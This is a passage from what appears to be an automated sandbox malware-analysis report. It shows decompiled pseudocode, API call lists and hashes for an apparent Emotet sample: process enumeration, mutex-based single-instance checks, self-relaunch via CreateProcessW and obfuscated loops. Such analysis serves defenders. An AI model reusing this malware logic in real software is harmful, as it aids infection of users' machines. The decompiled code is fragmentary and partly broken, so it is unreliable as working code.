				intOrPtr _v200;
				intOrPtr _v204;
				signed int _v205;
				long _t73;
				signed int _t76;
				int _t80;
				signed int _t82;
				signed int _t84;
				signed int _t107;
				signed int _t125;

				_v28 = 0;
				_v32 = 0x556fb6e9;
				_v36 = 0x50e74a64;
				_v84 = 0;
				_v88 = 0x6f1b79c2;
				_v104 =  &_v72;
				GetSystemInfo( &_v72); // executed
				_t10 =  &_v36; // 0x50e74a64
				_v96 =  *_t10 + 0xaf18b59c;
				_v108 =  &_v92;
				do {
					_v92 = 0x972;
					_t17 =  &_v36; // 0x50e74a64
					_t82 = __imp__GetConsoleProcessList;
					_v112 = _v96;
					_v116 = _v88;
					_v120 = _v84;
					_v124 =  *_t17 + 0xaf18c32f;
					_v136 =  *_t82( &_v92, 1);
					_t73 = GetSysColor(_v132);
					_t26 =  &(_v72.dwProcessorType); // 0x50e74a64
					_v112 = _v124 + 1;
					_v88 =  *_t26 + _v124 - 0x50e74583;
					_t107 = _v128 ^ 0x66020923 | _v132;
					_t125 = _t107;
					_v144 = _t73;
					_v148 = _t107;
					if(_t125 != 0) {
						_t65 =  &(_v72.dwProcessorType); // 0x50e74a64
						_v192 = 0x50e74a64 -  *_t65;
						_t76 = IsDlgButtonChecked(0x9821e7, _v88);
						if(0x50e74a64 == _v200) {
							goto L3;
						}
					} else {
						L3:
						_v160 = _v72.dwProcessorType;
						_v164 = _v72.dwNumberOfProcessors ^ 0x2a106072;
						_v180 = GetMenuState(0x5737ed, 0xfb5, 0xfb5);
						_v184 = _v120;
						_v188 = _v116;
						_t80 = GetThreadPriority(0x578306);
						_t52 = _t125 >= 0;
						_t84 = (_t82 & 0xffffff00 | _t125 >= 0x00000000) & 0xffffff00 | _t52;
						_v192 = _t80;
						_v196 = _v184 - _v176;
						_v197 = _t84;
						_v204 = _v188 - _v172;
						_v205 = _t84;
						if(_t52 != 0) {
							_v205 = _v197;
						}
						_t76 = _v205;
						if(_t76 == 0) {
							goto L7;
						}
					}
					L10:
					return _t76;
					L7:
					_t76 = _v132;
					_v128 = _v132;
				} while (_t76 < 0x10b);
				goto L10;
			}

0x004015fa
0x00401605
0x00401610
0x0040161b
0x00401623
0x00401636
0x0040163a
0x00401640
0x0040164d
0x00401651
0x00401655
0x00401659
0x00401669
0x0040167a
0x00401683
0x00401687
0x0040168b
0x0040168f
0x004016a0
0x004016a4
0x004016ab
0x004016b2
0x004016c1
0x004016d3
0x004016d3
0x004016d5
0x004016d9
0x004016dd
0x0040179c
0x004017af
0x004017b3
0x004017bb
0x00000000
0x00000000
0x004016e3
0x004016e5
0x0040170d
0x00401711
0x0040172a
0x0040172e
0x00401732
0x00401736
0x0040174f
0x0040174f
0x00401752
0x00401756
0x0040175a
0x0040175e
0x00401762
0x00401766
0x0040176c
0x0040176c
0x00401770
0x00401776
0x00000000
0x00401778
0x00401776
0x004017c1
0x004017c8
0x0040177a
0x0040177a
0x00401782
0x00401786
0x00000000

APIs

GetSystemInfo.KERNELBASE(?), ref: 0040163A
GetConsoleProcessList.KERNEL32(00000972,00000001), ref: 00401693
GetThreadPriority.KERNEL32(00578306), ref: 00401736

Strings

r, xrefs: 00401659
dJP, xrefs: 00401640
dJP, xrefs: 00401793

Memory Dump Source

Source File: 00000000.00000002.655068169.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655048325.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655075054.0000000000404000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655079310.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655083203.0000000000407000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655091229.000000000040E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655104285.0000000000418000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655115671.0000000000427000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_emo.jbxd

Similarity

API ID: ConsoleInfoListPriorityProcessSystemThread
String ID: dJP$dJP$r
API String ID: 3951346356-2118292658
Opcode ID: 0baf608def694c219c9aefbaaf0502e0979d3dab35e0e54f6138ec73305aec92
Instruction ID: 55a9c622c91c1169bcf04803a737580315d0714665c6c57eac11f5bd771bde65
Opcode Fuzzy Hash: 0baf608def694c219c9aefbaaf0502e0979d3dab35e0e54f6138ec73305aec92
Instruction Fuzzy Hash: A551F1B59083808FD314CF69D980A5BFBE1BBC9704F10892EE598A73A5D7749905CF46

Uniqueness

Uniqueness Score: -1.00%

Function 041D1C10, Relevance: 1.5, APIs: 1, Instructions: 8processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 041D1C14

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CreateSnapshotToolhelp32
String ID:
API String ID: 3332741929-0
Opcode ID: b488236a6871aa6a0e4188ac124f23ff146e342a1728ba4e0c8b08a6efe22bfc
Instruction ID: 0343c151858ea96470730ac170a379e5f325336d4859d6108e4f7738d204c456
Opcode Fuzzy Hash: b488236a6871aa6a0e4188ac124f23ff146e342a1728ba4e0c8b08a6efe22bfc
Instruction Fuzzy Hash: A9B09276708620C78B2C267AA8CC0285992565E23431B0762CEBA972E2B7A4AC439841

Uniqueness

Uniqueness Score: -1.00%

Function 041D11CD, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

			E041D11CD(void* __edi) {
				void* __esi;
				void* _t7;
				void* _t14;
				void* _t17;
				void* _t19;
				void* _t21;

				_t17 = __edi;
				GetModuleFileNameW(??, ??, ??);
				_push(_t21 - 0x18);
				_push(0x80);
				_t7 = L041D2020(_t19); // executed
				if(_t7 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					CloseHandle( *(_t21 - 0x18));
					CloseHandle( *(_t21 - 0x14));
				}
				CloseHandle(_t19);
				CloseHandle(_t14);
				return _t17;
			}

0x041d11cd
0x041d11cd
0x041d11d6
0x041d11d7
0x041d11e2
0x041d11ec
0x041d11f1
0x041d11fa
0x041d1203
0x041d1203
0x041d120a
0x041d1211
0x041d121f

APIs

GetModuleFileNameW.KERNEL32 ref: 041D11CD
WaitForSingleObject.KERNEL32(?,000000FF), ref: 041D11F1
CloseHandle.KERNEL32(?,?,000000FF), ref: 041D11FA
CloseHandle.KERNEL32(?,?,000000FF), ref: 041D1203
CloseHandle.KERNEL32(?,?,000000FF), ref: 041D120A
CloseHandle.KERNEL32(?,?,?,000000FF), ref: 041D1211

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CloseHandle$FileModuleNameObjectSingleWait
String ID:
API String ID: 2436384749-0
Opcode ID: bbcb72ad611ab28e4cbaf765fd2f5f1fa0214a925ae3c5fc8cdbb0c22d999abf
Instruction ID: 1563cba58795df33a6c26a7213e47f023cf6538f2348a4f571dce3196e27cfde
Opcode Fuzzy Hash: bbcb72ad611ab28e4cbaf765fd2f5f1fa0214a925ae3c5fc8cdbb0c22d999abf
Instruction Fuzzy Hash: A8E06D3AA00015ABCB055BE3ED499AD7B39EF4A723F0002A1F61AD40D0DB295DC5CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 041D2031, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E041D2031(WCHAR* __esi) {
				int _t11;
				void* _t17;
				void* _t21;

				E041D17E0(_t17);
				 *(_t21 - 0x58) = 0x44;
				_t11 = CreateProcessW(__esi, 0, 0, 0, 0,  *(_t21 + 8), 0, 0, _t21 - 0x58, _t21 - 0x10); // executed
				if(_t11 == 0) {
					goto 0x41f0675;
					asm("int3");
					return _t11;
				} else {
					if( *((intOrPtr*)(_t21 + 0xc)) == 0) {
						CloseHandle( *(_t21 - 0x10));
						CloseHandle( *(_t21 - 0xc));
						return 1;
					} else {
						asm("movdqu xmm0, [ebp-0x10]");
						asm("movdqu [eax], xmm0");
						return 1;
					}
				}
			}

0x041d2031
0x041d2039
0x041d2055
0x041d205d
0x041d2095
0x041d209a
0x041d209b
0x041d205f
0x041d2064
0x041d207c
0x041d2085
0x041d2094
0x041d2066
0x041d2066
0x041d206b
0x041d2078
0x041d2078
0x041d2064

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 041D2055
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 041D207C
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,00000000,00000000,00000044,?), ref: 041D2085

Strings

D, xrefs: 041D2039

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: D
API String ID: 2922976086-2746444292
Opcode ID: aee7981366e75d6e6472b2fb0ca61540dd57c6f0e878a0cb947f74e293442995
Instruction ID: 4616b25b18b2163853d7879352e447b0681768454e0010af83a5d9fe9ce0166b
Opcode Fuzzy Hash: aee7981366e75d6e6472b2fb0ca61540dd57c6f0e878a0cb947f74e293442995
Instruction Fuzzy Hash: F6F03071B50209BBEF214FD6DC45BED7B78EB49701F100291FA14AD1D0EBB6A990C794

Uniqueness

Uniqueness Score: -1.00%

Function 041D103C, Relevance: 6.0, APIs: 4, Instructions: 46
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 29%

			E041D103C(void* __esi, void* __eflags) {
				void* _t28;
				int _t33;
				void* _t38;
				void* _t48;
				void* _t54;
				void* _t62;
				void* _t63;
				int _t76;
				void* _t78;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				void* _t90;

				_t78 = __esi;
				 *(_t86 - 4) = 0;
				 *((intOrPtr*)(_t86 - 8)) = GetCurrentProcessId();
				_t76 = 0; // executed
				L041D1C00(E041D1000, _t86 - 4); // executed
				_t4 = _t76 + 0x14; // 0x14
				_t28 = L041D1D10(0x41e2000, _t4, 0, _t78);
				_t79 = _t28;
				 *0x41e5070(_t86 - 0x118, 0x40, _t28,  *(_t86 - 4), 0x64da9f26);
				_t90 = _t88 + 0x14;
				L041D1DB0(_t28);
				_t33 = CreateMutexW(0, 1, _t86 - 0x118); // executed
				_t62 = _t33;
				if(_t62 == 0) {
					L6:
					goto 0x41f0045;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					 *_t33 =  *_t33 + _t33;
					 *0x41e5070(_t86 - 0x118, 0x40, _t33,  *((intOrPtr*)(_t86 - 8)));
					L041D1DB0(_t33);
					_t38 = CreateMutexW(0, 1, _t86 - 0x118); // executed
					_t63 = _t38;
					if(_t63 != 0) {
						goto 0x41f0062;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						 *_t38 = _t38 +  *_t38;
						 *0x41e5070(_t86 - 0x98, 0x40, _t38,  *((intOrPtr*)(_t86 - 8)));
						L041D1DB0(_t38);
						_t83 = CreateEventW(0, 1, 0, _t86 - 0x98);
						if(_t83 != 0) {
							goto 0x41f007f;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							GetModuleFileNameW();
							_push(_t86 - 0x18);
							_push(0x80);
							_t48 = L041D2020(_t83); // executed
							if(_t48 != 0) {
								WaitForSingleObject(_t83, 0xffffffff);
								CloseHandle( *(_t86 - 0x18));
								CloseHandle( *(_t86 - 0x14));
							}
							CloseHandle(_t83);
						}
						CloseHandle(_t63);
					}
				} else {
					if(GetLastError() == 0xb7) {
						_t54 = L041D1D10(0x41e2020, _t53 + 0x1d, 0, _t79);
						 *0x41e5070(_t86 - 0x98, 0x40, _t54,  *(_t86 - 4));
						_t90 = _t90 + 0x14;
						L041D1DB0(_t54);
						_t85 = CreateEventW(0, 1, 0, _t86 - 0x98);
						if(_t85 != 0) {
							SetEvent(_t85);
							CloseHandle(_t85);
							_t76 = 1;
						}
					}
					_t33 = CloseHandle(_t62);
					if(_t76 == 0) {
						goto L6;
					}
				}
				return _t76;
			}

0x041d103c
0x041d103c
0x041d104c
0x041d1054
0x041d1056
0x041d1060
0x041d1068
0x041d1070
0x041d107f
0x041d1085
0x041d108a
0x041d1099
0x041d109f
0x041d10a3
0x041d111f
0x041d111f
0x041d1124
0x041d1125
0x041d1126
0x041d1127
0x041d1128
0x041d1129
0x041d112a
0x041d112b
0x041d1131
0x041d1145
0x041d1150
0x041d1160
0x041d1166
0x041d116a
0x041d1170
0x041d1175
0x041d1176
0x041d1177
0x041d1178
0x041d1179
0x041d117a
0x041d117b
0x041d117c
0x041d1182
0x041d1196
0x041d11a1
0x041d11b9
0x041d11bd
0x041d11bf
0x041d11c4
0x041d11c5
0x041d11c6
0x041d11c7
0x041d11c8
0x041d11c9
0x041d11ca
0x041d11cb
0x041d11cc
0x041d11cd
0x041d11d6
0x041d11d7
0x041d11e2
0x041d11ec
0x041d11f1
0x041d11fa
0x041d1203
0x041d1203
0x041d120a
0x041d120a
0x041d1211
0x041d1211
0x041d10a5
0x041d10b0
0x041d10bf
0x041d10d6
0x041d10dc
0x041d10e1
0x041d10f7
0x041d10fb
0x041d10fe
0x041d1105
0x041d110b
0x041d110b
0x041d10fb
0x041d1111
0x041d1119
0x00000000
0x00000000
0x041d1119
0x041d121f

APIs

GetCurrentProcessId.KERNEL32 ref: 041D1043
CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 041D1099
GetLastError.KERNEL32 ref: 041D10A5
CloseHandle.KERNEL32(00000000), ref: 041D1111

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CloseCreateCurrentErrorHandleLastMutexProcess
String ID:
API String ID: 4019642867-0
Opcode ID: 196f1a498ecdd904c6d22119d094f01fdbf2cfb263a240c23827a839a227616b
Instruction ID: 2773e3a8c3a04204c97f04401c13b38731c5aae8f4deb1f725f662d323391ab0
Opcode Fuzzy Hash: 196f1a498ecdd904c6d22119d094f01fdbf2cfb263a240c23827a839a227616b
Instruction Fuzzy Hash: C20147B9A00104B7EB10AFE299C87ED7776EB84345F000295E60AA6141DF386E808B91

Uniqueness

Uniqueness Score: -1.00%

Function 041B228E, Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 14
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmpW.KERNELBASE ref: 041B22BB

Strings

ov8oTdn, xrefs: 041B22A9
_E9e3X1YKeRS, xrefs: 041B22A2

Memory Dump Source

Source File: 00000000.00000002.655502185.00000000041B0000.00000040.00000001.sdmp, Offset: 041B0000, based on PE: true

Associated: 00000000.00000002.655508379.00000000041B6000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41b0000_emo.jbxd

Similarity

API ID: lstrcmp
String ID: _E9e3X1YKeRS$ov8oTdn
API String ID: 1534048567-2173848329
Opcode ID: 767c0e2d61aa40a008157558bd061b593a424725f65c103a26dbdafb493f3204
Instruction ID: 1fc0e114d92f6717bddb69f450e0004b4100f948313181f92441c9dbf20a2b42
Opcode Fuzzy Hash: 767c0e2d61aa40a008157558bd061b593a424725f65c103a26dbdafb493f3204
Instruction Fuzzy Hash: D0E0ECB4E102148BDB05DF389E851557BF0BB15204F00C498C455AB351DB30B959CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 004017C9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIoCounters.KERNEL32 ref: 004018C5

Strings

k, xrefs: 00401811

Memory Dump Source

Source File: 00000000.00000002.655068169.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655048325.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655075054.0000000000404000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655079310.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655083203.0000000000407000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655091229.000000000040E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655104285.0000000000418000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655115671.0000000000427000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_emo.jbxd

Similarity

API ID: CountersProcess
String ID: k
API String ID: 3788977324-140662621
Opcode ID: 6519cddde02c2bbe04f027cc78b2d7567aa864a3355e9627ab9acfd435b5d862
Instruction ID: 250afb0867a41a120b8a0bcaffcf91279784017dced7e6b089d061e50cd8f47c
Opcode Fuzzy Hash: 6519cddde02c2bbe04f027cc78b2d7567aa864a3355e9627ab9acfd435b5d862
Instruction Fuzzy Hash: 4F313CB59093408FC310DF29D94475BBBE0FFC9314F148A6EE598AB391DB359909CB82

Uniqueness

Uniqueness Score: -1.00%

Function 041D1C27, Relevance: 3.0, APIs: 2, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Process32FirstW.KERNEL32 ref: 041D1C33
FindCloseChangeNotification.KERNELBASE ref: 041D1C71

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindFirstNotificationProcess32
String ID:
API String ID: 2932581522-0
Opcode ID: 477ee229e598c59ccc08643465d2674e348f4573b9a4de719d610148f44c9a0d
Instruction ID: ee21ec8f542f6abed5d7454e5c133ed143d9f65e487e5eb9381b4f34ddf6cc66
Opcode Fuzzy Hash: 477ee229e598c59ccc08643465d2674e348f4573b9a4de719d610148f44c9a0d
Instruction Fuzzy Hash: D6C002B4605511AAE6191AA3AC4C66E3E69EB0A641B114185E90298082DB686A829AEA

Uniqueness

Uniqueness Score: -1.00%

Function 041D1C58, Relevance: 3.0, APIs: 2, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Process32NextW.KERNEL32 ref: 041D1C58
FindCloseChangeNotification.KERNELBASE ref: 041D1C71

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNextNotificationProcess32
String ID:
API String ID: 2947032094-0
Opcode ID: 76a4e89f0bd71176b393fdb92807789cc372bf0df5e76033fb1f19d8d44aec0d
Instruction ID: a87704d9e9a2acc38b98916931ed632dbe1887f4f521322833d81a6d8eadade4
Opcode Fuzzy Hash: 76a4e89f0bd71176b393fdb92807789cc372bf0df5e76033fb1f19d8d44aec0d
Instruction Fuzzy Hash: 18B01274304000D79A0C0EF3AC8C1293F24FD0F7413020145F203C8051FBA8BA82E65F

Uniqueness

Uniqueness Score: -1.00%

Function 00401919, Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 20%

			_entry_(signed int __ebx, void* __edx, void* __edi, signed int __esi, void* __eflags) {
				intOrPtr _v0;
				signed int _v4;
				signed int _v8;
				char _v36;
				char _v88;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				CHAR* _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t42;
				int _t43;
				intOrPtr _t44;
				int _t45;
				intOrPtr* _t61;
				signed int _t75;
				void* _t82;
				intOrPtr* _t83;
				void* _t84;
				intOrPtr* _t85;
				intOrPtr* _t87;

				_t46 = __ebx;
				_t75 = __esi;
				E0040157B(__esi, _t82); // executed
				_t31 = __ebx;
				_t83 = _t82 - (2 << 1);
				 *_t83 = __ebx;
				_t84 = _t83 - 4;
				if(2 << 5 > 0x159) {
					L3:
					_t75 = _t75 - 0x00000001 & 0x40004001;
					_t92 = _t46 + 0x808 - _t75;
					if(_t46 + 0x808 != _t75) {
						_t84 = _t84 + 0x24;
					}
					0;
					_v4 = _t31;
				} else {
					_t31 = __ebx - 0x10;
					if(_t31 == 0) {
						_t46 = __ebx & 0x00008000;
						goto L3;
					}
				}
				_t85 = _t84 - 0x88;
				_v104 = _v0;
				_v108 = _v4;
				_v112 = _v8;
				_v116 = GetCommandLineA();
				_t34 = E004017C9(_v4); // executed
				 *0x40527c = _v112;
				 *0x405280 = _v104;
				 *0x405278 = _v108;
				_v120 = _t34;
				E004015E7(); // executed
				_t36 = E004017C9(_v112); // executed
				 *_t85 = AllocConsole;
				_v124 = _t36;
				_t37 = E00402C83(_t92, _t75); // executed
				_t93 = _t37;
				_v128 = 0;
				if(_t37 == 0) {
					_t42 = E00402994(_t93); // executed
					 *_t85 =  &_v36;
					_v120 = _t42;
					_t43 = TranslateMessage(??);
					_t87 = _t85 - 4;
					_v124 = _t43;
					_t44 =  *__imp__CoRevokeMallocSpy();
					_t61 = _t87;
					 *((intOrPtr*)(_t61 + 4)) =  &_v88;
					 *_t61 = 0x6e0cae;
					_v128 = _t44;
					_t45 = GetComboBoxInfo(??, ??);
					_t85 = _t87 - 8;
					_v132 = _t45;
					_v116 = 1;
				}
				_v136 = _v116;
				E00401366();
				E004013DB();
				return _v136;
			}

0x00401919
0x0040191e
0x00401920
0x00401931
0x00401937
0x00401939
0x00401941
0x0040194d
0x0040195e
0x00401965
0x0040196b
0x0040196d
0x0040196f
0x0040196f
0x00401978
0x00401979
0x0040194f
0x0040194f
0x00401952
0x00401958
0x00000000
0x00401958
0x00401952
0x00401980
0x00401995
0x00401998
0x0040199b
0x004019a0
0x004019a3
0x004019ab
0x004019b4
0x004019bd
0x004019c3
0x004019c6
0x004019cb
0x004019d6
0x004019d9
0x004019dc
0x004019e3
0x004019e6
0x004019e9
0x004019eb
0x004019f5
0x004019fd
0x00401a00
0x00401a02
0x00401a0b
0x00401a0e
0x00401a10
0x00401a15
0x00401a18
0x00401a24
0x00401a27
0x00401a29
0x00401a31
0x00401a34
0x00401a34
0x00401a3a
0x00401a40
0x00401a45
0x00401a58

APIs

GetCommandLineA.KERNEL32 ref: 0040199E

Memory Dump Source

Source File: 00000000.00000002.655068169.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655048325.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655075054.0000000000404000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655079310.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655083203.0000000000407000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655091229.000000000040E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655104285.0000000000418000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655115671.0000000000427000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_emo.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: 1eb2ec233e723fc7431f0c4d60abb82fbaa3d693c73f63724c31bb3c0b82c00b
Instruction ID: 697a9fdaf7a7b85b496a5de456bbea060a6a5a94d629ce848093c5ee5c773496
Opcode Fuzzy Hash: 1eb2ec233e723fc7431f0c4d60abb82fbaa3d693c73f63724c31bb3c0b82c00b
Instruction Fuzzy Hash: 1D314CB5D007188BDB18EFB9D99569DBBB1EF88300F10813ED946BB395DA385844CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00401D7A, Relevance: 1.6, APIs: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetBinaryTypeW.KERNEL32 ref: 00401DBE

Memory Dump Source

Source File: 00000000.00000002.655068169.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.655048325.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655075054.0000000000404000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.655079310.0000000000405000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.655083203.0000000000407000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655091229.000000000040E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655104285.0000000000418000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.655115671.0000000000427000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_emo.jbxd

Similarity

API ID: BinaryType
String ID:
API String ID: 3726996659-0
Opcode ID: 2d603526450da3624c836eae8b4edec7289f27a0333b0e22c92048b21867e665
Instruction ID: 8a010557062a265b5564ed1177644ad26c70c0deb9faf6cde1c4ec6a99fe5498
Opcode Fuzzy Hash: 2d603526450da3624c836eae8b4edec7289f27a0333b0e22c92048b21867e665
Instruction Fuzzy Hash: 7321C2B4D002098BCF48DFA8C4916AEBBF0EF48304F50856ED81AA7390E7399A45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 041D112C, Relevance: 1.5, APIs: 1, Instructions: 29
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNELBASE(00000000,00000001,?), ref: 041D1160

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: 575d88128fb971554e56767548e3fbcbedbb5ca2c4538b837c2d373246e85ae9
Instruction ID: 7fd84fefa846e6facbd53df072e885be07108d70e40214376d8b14a091e26122
Opcode Fuzzy Hash: 575d88128fb971554e56767548e3fbcbedbb5ca2c4538b837c2d373246e85ae9
Instruction Fuzzy Hash: BEE061B670010467EB1056D76C857DD7779DB44311F0001F2FB0DDB141EB619D4547E1

Uniqueness

Uniqueness Score: -1.00%

Function 041DF290, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			_entry_() {
				void* _t3;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				L041DD430();
				L041DE1D0(); // executed
				_t3 = L041D1030(); // executed
				_t11 = _t3;
				if(_t3 != 0) {
					L041DD020(_t5, _t6, _t7, _t8, _t11);
				}
				ExitProcess(0);
			}

0x041df296
0x041df29b
0x041df2a0
0x041df2a5
0x041df2a7
0x041df2a9
0x041df2a9
0x041df2b0

APIs

ExitProcess.KERNEL32 ref: 041DF2B0

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
